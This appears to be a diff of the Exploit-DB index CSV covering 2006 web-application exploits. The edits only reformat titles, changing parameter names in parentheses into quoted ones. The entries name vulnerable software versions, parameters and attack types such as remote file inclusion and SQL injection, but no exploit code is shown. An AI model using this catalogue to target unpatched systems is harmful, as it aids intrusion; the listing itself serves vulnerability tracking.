+2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - 'functions_mod_user.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 < 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps,0 @@ -17294,107 +17295,107 @@ id,file,description,date,author,platform,type,port 2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 -2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 +2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - 'cl_headers' Include",2006-08-25,Kacper,php,webapps,0 2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 2261,platforms/php/webapps/2261.php,"iziContents RC6 - Remote Code Execution",2006-08-27,Kacper,php,webapps,0 -2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection",2006-08-27,Kacper,php,webapps,0 +2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - 'podpis' SQL Injection",2006-08-27,Kacper,php,webapps,0 2263,platforms/php/webapps/2263.txt,"Ay System CMS 2.6 - 'main.php' Remote File Inclusion",2006-08-27,SHiKaA,php,webapps,0 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",cgi,webapps,0 -2268,platforms/php/webapps/2268.php,"e107 < 0.75 - (GLOBALS Overwrite) Remote Code Execution",2006-08-28,rgod,php,webapps,0 +2268,platforms/php/webapps/2268.php,"e107 < 0.75 - GLOBALS Overwrite Remote Code Execution",2006-08-28,rgod,php,webapps,0 2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0 2270,platforms/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,php,webapps,0 -2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote File Inclusion",2006-08-29,"Mehmet Ince",php,webapps,0 +2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - 'chemin' Remote File Inclusion",2006-08-29,"Mehmet Ince",php,webapps,0 2272,platforms/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",php,webapps,0 2273,platforms/php/webapps/2273.txt,"ExBB Italiano 0.2 - exbb[home_path] Remote File Inclusion",2006-08-29,SHiKaA,php,webapps,0 2275,platforms/php/webapps/2275.txt,"PHPECard 2.1.4 - 'functions.php' Remote File Inclusion",2006-08-29,LeAk,php,webapps,0 -2279,platforms/php/webapps/2279.txt,"phpAtm 1.21 - (include_location) Remote File Inclusion",2006-08-30,KinSize,php,webapps,0 -2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b - (_incMgr) Remote File Inclusion",2006-08-30,Kacper,php,webapps,0 -2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - (lpref) Remote File Inclusion",2006-08-31,Kacper,php,webapps,0 +2279,platforms/php/webapps/2279.txt,"phpAtm 1.21 - 'include_location' Remote File Inclusion",2006-08-30,KinSize,php,webapps,0 +2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion",2006-08-30,Kacper,php,webapps,0 +2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - 'lpref' Remote File Inclusion",2006-08-31,Kacper,php,webapps,0 2282,platforms/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,php,webapps,0 2285,platforms/php/webapps/2285.txt,"MyBace Light - 'login_check.php' Remote File",2006-09-01,"Philipp Niedziela",php,webapps,0 -2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 +2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - 'YID' SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution",2006-09-02,rgod,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 -2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 -2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 +2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - 'x_admindir' Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 +2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote Exploit",2006-09-03,rgod,php,webapps,0 2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 -2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 -2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 +2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - 'tr' SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 +2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - 'ADODB_DIR' Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 2297,platforms/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Remote Code Execution",2006-09-04,Kacper,php,webapps,0 2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0 -2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution",2006-09-04,DarkFig,php,webapps,0 -2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 -2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 - (page) Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0 +2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - 'cmd' Remote Command Execution",2006-09-04,DarkFig,php,webapps,0 +2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - 'my_ms[root]' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 +2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 - 'page' Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0 2305,platforms/php/webapps/2305.txt,"AnnonceV News Script 1.1 - 'page' Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0 2306,platforms/asp/webapps/2306.txt,"Zix Forum 1.12 - 'RepId' SQL Injection (1)",2006-09-05,"Chironex Fleckeri",asp,webapps,0 2307,platforms/php/webapps/2307.txt,"ACGV News 0.9.1 - 'article.php' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2308,platforms/php/webapps/2308.txt,"C-News 1.0.1 - 'path' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2309,platforms/php/webapps/2309.txt,"Sponge News 2.2 - 'sndir' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 -2310,platforms/php/webapps/2310.php,"PhpCommander 3.0 - (upload) Remote Code Execution",2006-09-05,Kacper,php,webapps,0 +2310,platforms/php/webapps/2310.php,"PhpCommander 3.0 - 'upload' Remote Code Execution",2006-09-05,Kacper,php,webapps,0 2311,platforms/php/webapps/2311.txt,"phpBB Shadow Premod 2.7.1 - Remote File Inclusion",2006-09-06,Kw3[R]Ln,php,webapps,0 2312,platforms/php/webapps/2312.txt,"BinGo News 3.01 - 'bnrep' Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 -2313,platforms/php/webapps/2313.txt,"phpFullAnnu 5.1 - (repmod) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 +2313,platforms/php/webapps/2313.txt,"phpFullAnnu 5.1 - 'repmod' Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 - 'Core.php' Remote File Inclusion",2006-09-06,"the master",php,webapps,0 -2315,platforms/php/webapps/2315.txt,"Akarru 0.4.3.34 - (bm_content) Remote File Inclusion",2006-09-06,ddoshomo,php,webapps,0 +2315,platforms/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,php,webapps,0 2316,platforms/php/webapps/2316.txt,"PayProCart 1146078425 - Multiple Remote File Inclusions",2006-09-07,momo26,php,webapps,0 -2317,platforms/php/webapps/2317.txt,"SL_Site 1.0 - (spaw_root) Remote File Inclusion",2006-09-07,Kw3[R]Ln,php,webapps,0 -2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - (l) Remote File Inclusion",2006-09-07,"Mehmet Ince",php,webapps,0 -2319,platforms/php/webapps/2319.txt,"Fire Soft Board RC 3 - (racine) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 +2317,platforms/php/webapps/2317.txt,"SL_Site 1.0 - 'spaw_root' Remote File Inclusion",2006-09-07,Kw3[R]Ln,php,webapps,0 +2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - 'l' Remote File Inclusion",2006-09-07,"Mehmet Ince",php,webapps,0 +2319,platforms/php/webapps/2319.txt,"Fire Soft Board RC 3 - 'racine' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2321,platforms/php/webapps/2321.php,"DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution",2006-09-07,rgod,php,webapps,0 2322,platforms/php/webapps/2322.php,"DokuWiki 2006-03-09b - 'dwpage.php' System Disclosure",2006-09-07,rgod,php,webapps,0 2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - 'Include' Remote File Inclusion",2006-09-07,"the master",php,webapps,0 2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2326,platforms/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusions",2006-09-07,ddoshomo,php,webapps,0 -2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - (dir_path) Remote File Inclusion",2006-09-07,"Saudi Hackrz",php,webapps,0 -2329,platforms/php/webapps/2329.txt,"Somery 0.4.6 - (skin_dir) Remote File Inclusion",2006-09-08,basher13,php,webapps,0 +2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - 'dir_path' Remote File Inclusion",2006-09-07,"Saudi Hackrz",php,webapps,0 +2329,platforms/php/webapps/2329.txt,"Somery 0.4.6 - 'skin_dir' Remote File Inclusion",2006-09-08,basher13,php,webapps,0 2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,php,webapps,0 -2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0 -2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - (root_dir) Remote File Inclusion",2006-09-09,Kacper,php,webapps,0 +2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - 'base' Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0 +2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - 'root_dir' Remote File Inclusion",2006-09-09,Kacper,php,webapps,0 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - 'classified_path' File Inclusion",2006-09-09,MercilessTurk,php,webapps,0 2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - 'config.php' Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0 2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Inclusion",2006-09-10,Eddy_BAck0o,php,webapps,0 -2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion",2006-09-10,Solpot,php,webapps,0 -2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 Beta - (skiny) Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 -2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - (config) Remote File Inclusion",2006-09-11,basher13,php,webapps,0 +2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - 'path_to_folder' Remote File Inclusion",2006-09-10,Solpot,php,webapps,0 +2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 Beta - 'skiny' Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 +2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - 'config' Remote File Inclusion",2006-09-11,basher13,php,webapps,0 2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - 'INCLUDE_PATH' Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,php,webapps,0 -2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - (Poison Null Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 +2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - Poison Null Byte Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - 'functions.php' Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 -2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - (abs_pfad) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 -2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - (form) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - 'abs_pfad' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 -2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - Remote File Inclusion",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 -2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0 -2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0 +2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - 'art' Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0 +2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - 'root' Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0 2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - 'icerikno' SQL Injection",2006-09-13,RMx,asp,webapps,0 -2363,platforms/php/webapps/2363.tt,"Magic News Pro 1.0.3 - (script_path) Remote File Inclusion",2006-09-13,"Saudi Hackrz",php,webapps,0 -2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0 +2363,platforms/php/webapps/2363.tt,"Magic News Pro 1.0.3 - 'script_path' Remote File Inclusion",2006-09-13,"Saudi Hackrz",php,webapps,0 +2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - 'visEdit_root' Remote File Inclusion",2006-09-13,igi,php,webapps,0 2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Local/Remote File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0 -2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Inclusion",2006-09-14,Solpot,php,webapps,0 +2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - 'pagename' Remote File Inclusion",2006-09-14,Solpot,php,webapps,0 2367,platforms/php/webapps/2367.txt,"Mambo Component com_serverstat 0.4.4 - Remote File Inclusion",2006-09-14,"Mehmet Ince",php,webapps,0 -2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0 -2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - (PP_PATH) Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0 +2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - 'app_root' Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0 +2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - 'PP_PATH' Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0 2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - 'com_contact' Remote Code Execution",2006-09-15,rgod,php,webapps,0 -2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 < 1.1 - (tr) SQL Injection",2006-09-15,"Fix TR",asp,webapps,0 -2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0 -2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion",2006-09-15,Kacper,php,webapps,0 +2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 < 1.1 - 'tr' SQL Injection",2006-09-15,"Fix TR",asp,webapps,0 +2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - 'gBRootPath' Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0 +2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - 'script' Remote File Inclusion",2006-09-15,Kacper,php,webapps,0 2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Arbitrary File Upload",2006-09-15,simo64,php,webapps,0 2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion",2006-09-15,3l3ctric-Cracker,php,webapps,0 2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution",2006-09-16,simo64,php,webapps,0 2377,platforms/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,php,webapps,0 -2378,platforms/php/webapps/2378.php,"GNUTURK 2G - (t_id) SQL Injection",2006-09-16,p2y,php,webapps,0 +2378,platforms/php/webapps/2378.php,"GNUTURK 2G - 't_id' SQL Injection",2006-09-16,p2y,php,webapps,0 2379,platforms/php/webapps/2379.txt,"Mambo Component com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps,0 -2380,platforms/php/webapps/2380.txt,"UNAK-CMS 1.5 - (dirroot) Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0 +2380,platforms/php/webapps/2380.txt,"UNAK-CMS 1.5 - 'dirroot' Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0 2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution 0.9.1 - Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0 2382,platforms/php/webapps/2382.pl,"Zix Forum 1.12 - 'RepId' SQL Injection (2)",2006-09-17,SlimTim10,php,webapps,0 2383,platforms/php/webapps/2383.txt,"MobilePublisherPHP 1.5 RC2 - Remote File Inclusion",2006-09-17,Timq,php,webapps,0 @@ -17405,18 +17406,18 @@ id,file,description,date,author,platform,type,port 2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - '/users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0 2390,platforms/php/webapps/2390.txt,"PNPHPBB2 < 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 -2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0 -2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0 -2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0 -2394,platforms/php/webapps/2394.php,"more.groupware 0.74 - (new_calendarid) SQL Injection",2006-09-19,x128,php,webapps,0 +2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - 'view' Remote Command Execution",2006-09-19,rgod,php,webapps,0 +2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - 'Home_Path' Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0 +2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - 'Inc_Dir' Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0 +2394,platforms/php/webapps/2394.php,"more.groupware 0.74 - 'new_calendarid' SQL Injection",2006-09-19,x128,php,webapps,0 2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - 'tr' SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,php,webapps,0 2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - 'email' SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps,0 2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusions",2006-09-19,ajann,php,webapps,0 2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0 -2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0 +2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution",2006-09-20,Kacper,php,webapps,0 2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0 -2406,platforms/php/webapps/2406.php,"exV2 < 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0 +2406,platforms/php/webapps/2406.php,"exV2 < 2.0.4.3 - 'sort' SQL Injection",2006-09-21,rgod,php,webapps,0 2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 @@ -17434,9 +17435,9 @@ id,file,description,date,author,platform,type,port 2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - '0004_init_urls.php' Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0 2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - 'general.php' Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 -2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - 'temppath' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2431,platforms/php/webapps/2431.txt,"evoBB 0.3 - (path) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2431,platforms/php/webapps/2431.txt,"evoBB 0.3 - 'path' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - 'fs_form_links.php' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 @@ -17461,8 +17462,8 @@ id,file,description,date,author,platform,type,port 2457,platforms/php/webapps/2457.php,"UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0 2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusions",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 -2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 -2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 +2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - 'target' Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 +2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - 'BSX_LIBDIR' Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - '/includes/functions.php' Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0 2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0 @@ -17546,10 +17547,10 @@ id,file,description,date,author,platform,type,port 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - '/extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - '/forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 -2560,platforms/php/webapps/2560.txt,"CampSite 2.6.1 - (g_documentRoot) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2560,platforms/php/webapps/2560.txt,"CampSite 2.6.1 - 'g_documentRoot' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 